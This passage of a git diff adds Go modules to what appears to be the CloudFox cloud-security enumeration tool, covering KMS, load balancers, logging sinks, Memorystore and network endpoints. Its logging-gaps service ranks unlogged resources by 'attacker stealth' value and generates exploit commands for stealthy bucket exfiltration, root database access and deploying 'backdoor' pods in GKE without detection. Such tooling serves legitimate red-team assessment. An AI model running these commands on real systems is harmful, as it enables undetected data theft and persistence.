bindings and checks for public access +func parseKeyBindings(policy *kms.Policy) (bindings []IAMBinding, publicEncrypt bool, publicDecrypt bool) { + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on encrypt/decrypt roles + if member == "allUsers" || member == "allAuthenticatedUsers" { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": + publicEncrypt = true + case "roles/cloudkms.cryptoKeyDecrypter": + publicDecrypt = true + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": + publicEncrypt = true + publicDecrypt = true + } + } + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// extractVersionNumber extracts the version number from a crypto key version name +func extractVersionNumber(versionName string) string { + parts := strings.Split(versionName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return versionName +} diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go new file mode 100644 index 00000000..5c9b66b3 --- /dev/null +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -0,0 +1,273 @@ +package loadbalancerservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" +) + +type LoadBalancerService struct { + session *gcpinternal.SafeSession +} + +func New() *LoadBalancerService { + return &LoadBalancerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { + return &LoadBalancerService{session: session} +} + +// LoadBalancerInfo represents a load balancer configuration +type LoadBalancerInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // HTTP, HTTPS, TCP, SSL, UDP, INTERNAL + Scheme string `json:"scheme"` // EXTERNAL, INTERNAL + Region string `json:"region"` // global or regional + IPAddress string `json:"ipAddress"` + Port string `json:"port"` + Protocol string `json:"protocol"` + + // Backend info + BackendServices []string `json:"backendServices"` + BackendBuckets []string `json:"backendBuckets"` + HealthChecks []string `json:"healthChecks"` + + // SSL/TLS config + SSLPolicy string `json:"sslPolicy"` + SSLCertificates []string `json:"sslCertificates"` + MinTLSVersion string `json:"minTlsVersion"` + + // Security config + SecurityPolicy string `json:"securityPolicy"` // Cloud Armor +} + +// SSLPolicyInfo represents an SSL policy +type SSLPolicyInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + MinTLSVersion string `json:"minTlsVersion"` + Profile string `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM + CustomFeatures []string `json:"customFeatures"` +} + +// BackendServiceInfo represents a backend service +type BackendServiceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Protocol string `json:"protocol"` + Port int64 `json:"port"` + HealthCheck string `json:"healthCheck"` + SecurityPolicy string `json:"securityPolicy"` + EnableCDN bool `json:"enableCdn"` + SessionAffinity string `json:"sessionAffinity"` + ConnectionDraining int64 `json:"connectionDraining"` + Backends []string `json:"backends"` +} + +// ListLoadBalancers retrieves all load balancers in a project +func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var loadBalancers []LoadBalancerInfo + + // Get global forwarding rules (external HTTP(S), SSL Proxy, TCP Proxy) + globalFwdRules, err := service.GlobalForwardingRules.List(projectID).Context(ctx).Do() + if err == nil { + for _, rule := range globalFwdRules.Items { + lb := s.parseForwardingRule(rule, projectID, "global") + loadBalancers = append(loadBalancers, lb) + } + } + + // Get regional forwarding rules (internal, network LB) + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalRules, err := service.ForwardingRules.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, rule := range regionalRules.Items { + lb := s.parseForwardingRule(rule, projectID, region.Name) + loadBalancers = append(loadBalancers, lb) + } + } + } + } + + return loadBalancers, nil +} + +// ListSSLPolicies retrieves all SSL policies +func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var policies []SSLPolicyInfo + + resp, err := service.SslPolicies.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + for _, policy := range resp.Items { + info := SSLPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + MinTLSVersion: policy.MinTlsVersion, + Profile: policy.Profile, + CustomFeatures: policy.CustomFeatures, + } + policies = append(policies, info) + } + + return policies, nil +} + +// ListBackendServices retrieves all backend services +func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendServiceInfo, error) { + ctx := context.Background() + var service *compute.Service + var err error + + if s.session != nil { + service, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = compute.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + } + + var backends []BackendServiceInfo + + // Global backend services + globalBackends, err := service.BackendServices.List(projectID).Context(ctx).Do() + if err == nil { + for _, backend := range globalBackends.Items { + info := s.parseBackendService(backend, projectID) + backends = append(backends, info) + } + } + + // Regional backend services + regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() + if err == nil { + for _, region := range regionsResp.Items { + regionalBackends, err := service.RegionBackendServices.List(projectID, region.Name).Context(ctx).Do() + if err == nil { + for _, backend := range regionalBackends.Items { + info := s.parseRegionalBackendService(backend, projectID, region.Name) + backends = append(backends, info) + } + } + } + } + + return backends, nil +} + +func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo { + info := LoadBalancerInfo{ + Name: rule.Name, + ProjectID: projectID, + Region: region, + IPAddress: rule.IPAddress, + Port: rule.PortRange, + Protocol: rule.IPProtocol, + } + + // Determine load balancer type + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + info.Scheme = "EXTERNAL" + } else { + info.Scheme = "INTERNAL" + } + + // Determine type based on target + if rule.Target != "" { + if strings.Contains(rule.Target, "targetHttpProxies") { + info.Type = "HTTP" + } else if strings.Contains(rule.Target, "targetHttpsProxies") { + info.Type = "HTTPS" + } else if strings.Contains(rule.Target, "targetSslProxies") { + info.Type = "SSL_PROXY" + } else if strings.Contains(rule.Target, "targetTcpProxies") { + info.Type = "TCP_PROXY" + } else if strings.Contains(rule.Target, "targetPools") { + info.Type = "NETWORK" + } else if strings.Contains(rule.Target, "targetGrpcProxies") { + info.Type = "GRPC" + } + } else if rule.BackendService != "" { + info.Type = "INTERNAL" + info.BackendServices = []string{extractName(rule.BackendService)} + } + + return info +} + +func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo { + info := BackendServiceInfo{ + Name: backend.Name, + ProjectID: projectID, + Protocol: backend.Protocol, + Port: backend.Port, + EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, + } + + if backend.SecurityPolicy != "" { + info.SecurityPolicy = extractName(backend.SecurityPolicy) + } + + if len(backend.HealthChecks) > 0 { + info.HealthCheck = extractName(backend.HealthChecks[0]) + } + + if backend.ConnectionDraining != nil { + info.ConnectionDraining = backend.ConnectionDraining.DrainingTimeoutSec + } + + for _, be := range backend.Backends { + info.Backends = append(info.Backends, extractName(be.Group)) + } + + return info +} + +func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.BackendService, projectID, region string) BackendServiceInfo { + info := s.parseBackendService(backend, projectID) + return info +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git a/gcp/services/loggingGapsService/loggingGapsService.go b/gcp/services/loggingGapsService/loggingGapsService.go new file mode 100644 index 00000000..ba16c85f --- /dev/null +++ b/gcp/services/loggingGapsService/loggingGapsService.go @@ -0,0 +1,472 @@ +package logginggapsservice + +import ( + "context" + "fmt" + "strings" + + logging "cloud.google.com/go/logging/apiv2" + "cloud.google.com/go/logging/apiv2/loggingpb" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + sqladmin "google.golang.org/api/sqladmin/v1beta4" + storage "google.golang.org/api/storage/v1" + "google.golang.org/api/iterator" +) + +type LoggingGapsService struct{} + +func New() *LoggingGapsService { + return &LoggingGapsService{} +} + +// LoggingGap represents a resource with missing or incomplete logging +type LoggingGap struct { + ResourceType string // compute, cloudsql, gke, bucket, project + ResourceName string + ProjectID string + Location string + LoggingStatus string // disabled, partial, misconfigured + MissingLogs []string // Which logs are missing + StealthValue string // HIGH, MEDIUM, LOW - value for attacker stealth + Recommendations []string + ExploitCommands []string // Commands to exploit the gap +} + +// AuditLogConfig represents the audit logging configuration for a project +type AuditLogConfig struct { + ProjectID string + DataAccessEnabled bool + AdminActivityEnabled bool // Always on, but good to verify + SystemEventEnabled bool + PolicyDeniedEnabled bool + ExemptedMembers []string + ExemptedServices []string +} + +// EnumerateLoggingGaps finds resources with logging gaps +func (s *LoggingGapsService) EnumerateLoggingGaps(projectID string) ([]LoggingGap, *AuditLogConfig, error) { + var gaps []LoggingGap + + // Get project-level audit log config + auditConfig, err := s.getProjectAuditConfig(projectID) + if err != nil { + auditConfig = &AuditLogConfig{ProjectID: projectID} + } + + // Check various resource types for logging gaps + if bucketGaps, err := s.checkBucketLogging(projectID); err == nil { + gaps = append(gaps, bucketGaps...) + } + + if computeGaps, err := s.checkComputeLogging(projectID); err == nil { + gaps = append(gaps, computeGaps...) + } + + if gkeGaps, err := s.checkGKELogging(projectID); err == nil { + gaps = append(gaps, gkeGaps...) + } + + if sqlGaps, err := s.checkCloudSQLLogging(projectID); err == nil { + gaps = append(gaps, sqlGaps...) + } + + // Check for log sinks that might be misconfigured + if sinkGaps, err := s.checkLogSinks(projectID); err == nil { + gaps = append(gaps, sinkGaps...) + } + + return gaps, auditConfig, nil +} + +func (s *LoggingGapsService) getProjectAuditConfig(projectID string) (*AuditLogConfig, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + config := &AuditLogConfig{ + ProjectID: projectID, + AdminActivityEnabled: true, // Always enabled + } + + // List log sinks to understand logging configuration + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + // Check if there's a sink for audit logs + if strings.Contains(sink.Filter, "protoPayload.@type") { + config.DataAccessEnabled = true + } + } + + return config, nil +} + +func (s *LoggingGapsService) checkBucketLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := storage.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Buckets.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, bucket := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if bucket logging is enabled + if bucket.Logging == nil || bucket.Logging.LogBucket == "" { + missingLogs = append(missingLogs, "Access logs disabled") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "bucket", + ResourceName: bucket.Name, + ProjectID: projectID, + Location: bucket.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Enable access logging for the bucket", + fmt.Sprintf("gsutil logging set on -b gs://%s gs://%s", bucket.Name, bucket.Name), + }, + ExploitCommands: []string{ + fmt.Sprintf("# Access without logs - stealth data exfil:\ngsutil cp gs://%s/* ./loot/ 2>/dev/null", bucket.Name), + fmt.Sprintf("# List contents without being logged:\ngsutil ls -r gs://%s/", bucket.Name), + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkComputeLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := compute.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + // Check VPC flow logs on subnets + req := service.Subnetworks.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SubnetworkAggregatedList) error { + for region, subnets := range page.Items { + regionName := region + if strings.HasPrefix(region, "regions/") { + regionName = strings.TrimPrefix(region, "regions/") + } + + for _, subnet := range subnets.Subnetworks { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check if VPC flow logs are enabled + if subnet.LogConfig == nil || !subnet.LogConfig.Enable { + missingLogs = append(missingLogs, "VPC Flow Logs disabled") + loggingStatus = "disabled" + } else if subnet.LogConfig.AggregationInterval != "INTERVAL_5_SEC" { + missingLogs = append(missingLogs, "VPC Flow Logs not at max granularity") + loggingStatus = "partial" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "subnet", + ResourceName: subnet.Name, + ProjectID: projectID, + Location: regionName, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable VPC Flow Logs on subnet", + "Set aggregation interval to 5 seconds for maximum visibility", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Network activity on this subnet won't be logged"), + fmt.Sprintf("# Lateral movement within VPC: %s", subnet.IpCidrRange), + }, + } + gaps = append(gaps, gap) + } + } + } + return nil + }) + + return gaps, err +} + +func (s *LoggingGapsService) checkGKELogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := container.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, err + } + + for _, cluster := range resp.Clusters { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check logging service + if cluster.LoggingService == "" || cluster.LoggingService == "none" { + missingLogs = append(missingLogs, "Cluster logging disabled") + loggingStatus = "disabled" + } else if cluster.LoggingService != "logging.googleapis.com/kubernetes" { + missingLogs = append(missingLogs, "Not using Cloud Logging") + loggingStatus = "partial" + } + + // Check monitoring service + if cluster.MonitoringService == "" || cluster.MonitoringService == "none" { + missingLogs = append(missingLogs, "Cluster monitoring disabled") + } + + // Check for specific logging components + if cluster.LoggingConfig != nil && cluster.LoggingConfig.ComponentConfig != nil { + components := cluster.LoggingConfig.ComponentConfig.EnableComponents + hasSystemComponents := false + hasWorkloads := false + for _, comp := range components { + if comp == "SYSTEM_COMPONENTS" { + hasSystemComponents = true + } + if comp == "WORKLOADS" { + hasWorkloads = true + } + } + if !hasSystemComponents { + missingLogs = append(missingLogs, "System component logs disabled") + } + if !hasWorkloads { + missingLogs = append(missingLogs, "Workload logs disabled") + } + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "gke", + ResourceName: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "CRITICAL", + Recommendations: []string{ + "Enable Cloud Logging for GKE cluster", + "Enable SYSTEM_COMPONENTS and WORKLOADS logging", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Get credentials for cluster with limited logging:\ngcloud container clusters get-credentials %s --location=%s --project=%s", cluster.Name, cluster.Location, projectID), + "# Run commands without workload logging:\nkubectl exec -it -- /bin/sh", + "# Deploy backdoor pods without detection:\nkubectl run backdoor --image=alpine -- sleep infinity", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkCloudSQLLogging(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + service, err := sqladmin.NewService(ctx) + if err != nil { + return nil, err + } + + var gaps []LoggingGap + + resp, err := service.Instances.List(projectID).Do() + if err != nil { + return nil, err + } + + for _, instance := range resp.Items { + missingLogs := []string{} + loggingStatus := "enabled" + + // Check database flags for logging + if instance.Settings != nil && instance.Settings.DatabaseFlags != nil { + hasQueryLogging := false + hasConnectionLogging := false + + for _, flag := range instance.Settings.DatabaseFlags { + // MySQL flags + if flag.Name == "general_log" && flag.Value == "on" { + hasQueryLogging = true + } + // PostgreSQL flags + if flag.Name == "log_statement" && flag.Value == "all" { + hasQueryLogging = true + } + if flag.Name == "log_connections" && flag.Value == "on" { + hasConnectionLogging = true + } + } + + if !hasQueryLogging { + missingLogs = append(missingLogs, "Query logging not enabled") + loggingStatus = "partial" + } + if !hasConnectionLogging { + missingLogs = append(missingLogs, "Connection logging not enabled") + } + } else { + missingLogs = append(missingLogs, "No logging flags configured") + loggingStatus = "disabled" + } + + if len(missingLogs) > 0 { + gap := LoggingGap{ + ResourceType: "cloudsql", + ResourceName: instance.Name, + ProjectID: projectID, + Location: instance.Region, + LoggingStatus: loggingStatus, + MissingLogs: missingLogs, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable query and connection logging", + "For MySQL: SET GLOBAL general_log = 'ON'", + "For PostgreSQL: ALTER SYSTEM SET log_statement = 'all'", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Connect without query logging:\ngcloud sql connect %s --user=root --project=%s", instance.Name, projectID), + "# Execute queries without being logged", + "# Exfiltrate data stealthily", + }, + } + gaps = append(gaps, gap) + } + } + + return gaps, nil +} + +func (s *LoggingGapsService) checkLogSinks(projectID string) ([]LoggingGap, error) { + ctx := context.Background() + client, err := logging.NewConfigClient(ctx) + if err != nil { + return nil, err + } + defer client.Close() + + var gaps []LoggingGap + + parent := fmt.Sprintf("projects/%s", projectID) + it := client.ListSinks(ctx, &loggingpb.ListSinksRequest{Parent: parent}) + + sinkCount := 0 + for { + sink, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + sinkCount++ + + // Check for disabled sinks + if sink.Disabled { + gap := LoggingGap{ + ResourceType: "log-sink", + ResourceName: sink.Name, + ProjectID: projectID, + Location: "global", + LoggingStatus: "disabled", + MissingLogs: []string{"Sink is disabled"}, + StealthValue: "HIGH", + Recommendations: []string{ + "Enable the log sink or remove if not needed", + }, + ExploitCommands: []string{ + "# Logs matching this sink filter are not being exported", + fmt.Sprintf("# Sink filter: %s", sink.Filter), + }, + } + gaps = append(gaps, gap) + } + + // Check for overly permissive exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + gap := LoggingGap{ + ResourceType: "log-exclusion", + ResourceName: fmt.Sprintf("%s/%s", sink.Name, exclusion.Name), + ProjectID: projectID, + Location: "global", + LoggingStatus: "exclusion-active", + MissingLogs: []string{fmt.Sprintf("Exclusion filter: %s", exclusion.Filter)}, + StealthValue: "MEDIUM", + Recommendations: []string{ + "Review exclusion filter for security implications", + }, + ExploitCommands: []string{ + fmt.Sprintf("# Logs matching this filter are excluded: %s", exclusion.Filter), + }, + } + gaps = append(gaps, gap) + } + } + } + + // Check if there are no sinks at all + if sinkCount == 0 { + gap := LoggingGap{ + ResourceType: "project", + ResourceName: projectID, + ProjectID: projectID, + Location: "global", + LoggingStatus: "no-export", + MissingLogs: []string{"No log sinks configured - logs only in Cloud Logging"}, + StealthValue: "LOW", + Recommendations: []string{ + "Configure log sinks to export logs to external storage", + "Ensures logs are preserved even if project is compromised", + }, + ExploitCommands: []string{ + "# Logs can be deleted if project is compromised", + "# Consider exporting to separate project or external SIEM", + }, + } + gaps = append(gaps, gap) + } + + return gaps, nil +} diff --git a/gcp/services/loggingService/loggingService.go b/gcp/services/loggingService/loggingService.go new file mode 100644 index 00000000..d9c83cdf --- /dev/null +++ b/gcp/services/loggingService/loggingService.go @@ -0,0 +1,256 @@ +package loggingservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + logging "google.golang.org/api/logging/v2" +) + +type LoggingService struct{} + +func New() *LoggingService { + return &LoggingService{} +} + +// SinkInfo holds Cloud Logging sink details with security-relevant information +type SinkInfo struct { + Name string + ProjectID string + Description string + CreateTime string + UpdateTime string + + // Destination configuration + Destination string // Full destination resource name + DestinationType string // bigquery, storage, pubsub, logging + DestinationBucket string // For storage destinations + DestinationDataset string // For BigQuery destinations + DestinationTopic string // For Pub/Sub destinations + DestinationProject string // Project containing the destination + + // Filter + Filter string + Disabled bool + + // Export identity + WriterIdentity string // Service account that writes to destination + + // Inclusion/exclusion + ExclusionFilters []string + + // Cross-project indicator + IsCrossProject bool +} + +// MetricInfo holds log-based metric details +type MetricInfo struct { + Name string + ProjectID string + Description string + Filter string + CreateTime string + UpdateTime string + + // Metric configuration + MetricKind string // DELTA, GAUGE, CUMULATIVE + ValueType string // INT64, DOUBLE, DISTRIBUTION + + // Labels extracted from logs + LabelCount int +} + +// Sinks retrieves all logging sinks in a project +func (ls *LoggingService) Sinks(projectID string) ([]SinkInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var sinks []SinkInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Sinks.List(parent) + err = call.Pages(ctx, func(page *logging.ListSinksResponse) error { + for _, sink := range page.Sinks { + info := parseSinkInfo(sink, projectID) + sinks = append(sinks, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return sinks, nil +} + +// Metrics retrieves all log-based metrics in a project +func (ls *LoggingService) Metrics(projectID string) ([]MetricInfo, error) { + ctx := context.Background() + + service, err := logging.NewService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + var metrics []MetricInfo + parent := fmt.Sprintf("projects/%s", projectID) + + call := service.Projects.Metrics.List(parent) + err = call.Pages(ctx, func(page *logging.ListLogMetricsResponse) error { + for _, metric := range page.Metrics { + info := parseMetricInfo(metric, projectID) + metrics = append(metrics, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "logging.googleapis.com") + } + + return metrics, nil +} + +// parseSinkInfo extracts relevant information from a logging sink +func parseSinkInfo(sink *logging.LogSink, projectID string) SinkInfo { + info := SinkInfo{ + Name: sink.Name, + ProjectID: projectID, + Description: sink.Description, + CreateTime: sink.CreateTime, + UpdateTime: sink.UpdateTime, + Destination: sink.Destination, + Filter: sink.Filter, + Disabled: sink.Disabled, + WriterIdentity: sink.WriterIdentity, + } + + // Parse destination type and details + info.DestinationType, info.DestinationProject = parseDestination(sink.Destination) + + switch info.DestinationType { + case "storage": + info.DestinationBucket = extractBucketName(sink.Destination) + case "bigquery": + info.DestinationDataset = extractDatasetName(sink.Destination) + case "pubsub": + info.DestinationTopic = extractTopicName(sink.Destination) + } + + // Check if cross-project + if info.DestinationProject != "" && info.DestinationProject != projectID { + info.IsCrossProject = true + } + + // Parse exclusion filters + for _, exclusion := range sink.Exclusions { + if !exclusion.Disabled { + info.ExclusionFilters = append(info.ExclusionFilters, exclusion.Filter) + } + } + + return info +} + +// parseMetricInfo extracts relevant information from a log-based metric +func parseMetricInfo(metric *logging.LogMetric, projectID string) MetricInfo { + info := MetricInfo{ + Name: metric.Name, + ProjectID: projectID, + Description: metric.Description, + Filter: metric.Filter, + CreateTime: metric.CreateTime, + UpdateTime: metric.UpdateTime, + } + + if metric.MetricDescriptor != nil { + info.MetricKind = metric.MetricDescriptor.MetricKind + info.ValueType = metric.MetricDescriptor.ValueType + info.LabelCount = len(metric.MetricDescriptor.Labels) + } + + return info +} + +// parseDestination parses the destination resource name +func parseDestination(destination string) (destType string, project string) { + switch { + case strings.HasPrefix(destination, "storage.googleapis.com/"): + destType = "storage" + // Format: storage.googleapis.com/bucket-name + parts := strings.Split(destination, "/") + if len(parts) >= 2 { + // Bucket name might encode project, but typically doesn't + project = "" + } + case strings.HasPrefix(destination, "bigquery.googleapis.com/"): + destType = "bigquery" + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "pubsub.googleapis.com/"): + destType = "pubsub" + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + case strings.HasPrefix(destination, "logging.googleapis.com/"): + destType = "logging" + // Format: logging.googleapis.com/projects/PROJECT_ID/locations/LOCATION/buckets/BUCKET_ID + if idx := strings.Index(destination, "/projects/"); idx >= 0 { + remainder := destination[idx+len("/projects/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + project = remainder[:slashIdx] + } + } + default: + destType = "unknown" + } + return +} + +// extractBucketName extracts bucket name from storage destination +func extractBucketName(destination string) string { + // Format: storage.googleapis.com/bucket-name + parts := strings.SplitN(destination, "/", 2) + if len(parts) >= 2 { + return parts[1] + } + return destination +} + +// extractDatasetName extracts dataset name from BigQuery destination +func extractDatasetName(destination string) string { + // Format: bigquery.googleapis.com/projects/PROJECT_ID/datasets/DATASET_ID + if idx := strings.Index(destination, "/datasets/"); idx >= 0 { + remainder := destination[idx+len("/datasets/"):] + if slashIdx := strings.Index(remainder, "/"); slashIdx >= 0 { + return remainder[:slashIdx] + } + return remainder + } + return "" +} + +// extractTopicName extracts topic name from Pub/Sub destination +func extractTopicName(destination string) string { + // Format: pubsub.googleapis.com/projects/PROJECT_ID/topics/TOPIC_ID + if idx := strings.Index(destination, "/topics/"); idx >= 0 { + return destination[idx+len("/topics/"):] + } + return "" +} diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go new file mode 100644 index 00000000..dd3fd006 --- /dev/null +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -0,0 +1,104 @@ +package memorystoreservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + redis "google.golang.org/api/redis/v1" +) + +type MemorystoreService struct { + session *gcpinternal.SafeSession +} + +func New() *MemorystoreService { + return &MemorystoreService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { + return &MemorystoreService{session: session} +} + +// RedisInstanceInfo represents a Redis instance +type RedisInstanceInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` +} + +// ListRedisInstances retrieves all Redis instances in a project +func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstanceInfo, error) { + ctx := context.Background() + var service *redis.Service + var err error + + if s.session != nil { + service, err = redis.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = redis.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + var instances []RedisInstanceInfo + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + req := service.Projects.Locations.Instances.List(parent) + err = req.Pages(ctx, func(page *redis.ListInstancesResponse) error { + for _, instance := range page.Instances { + info := s.parseRedisInstance(instance, projectID) + instances = append(instances, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "redis.googleapis.com") + } + + return instances, nil +} + +func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { + return RedisInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: instance.LocationId, + DisplayName: instance.DisplayName, + Tier: instance.Tier, + MemorySizeGB: instance.MemorySizeGb, + RedisVersion: instance.RedisVersion, + Host: instance.Host, + Port: instance.Port, + State: instance.State, + AuthEnabled: instance.AuthEnabled, + TransitEncryption: instance.TransitEncryptionMode, + ConnectMode: instance.ConnectMode, + AuthorizedNetwork: instance.AuthorizedNetwork, + ReservedIPRange: instance.ReservedIpRange, + CreateTime: instance.CreateTime, + } +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go new file mode 100644 index 00000000..77debf52 --- /dev/null +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -0,0 +1,284 @@ +package networkendpointsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + compute "google.golang.org/api/compute/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" +) + +type NetworkEndpointsService struct{} + +func New() *NetworkEndpointsService { + return &NetworkEndpointsService{} +} + +// PrivateServiceConnectEndpoint represents a PSC endpoint +type PrivateServiceConnectEndpoint struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string 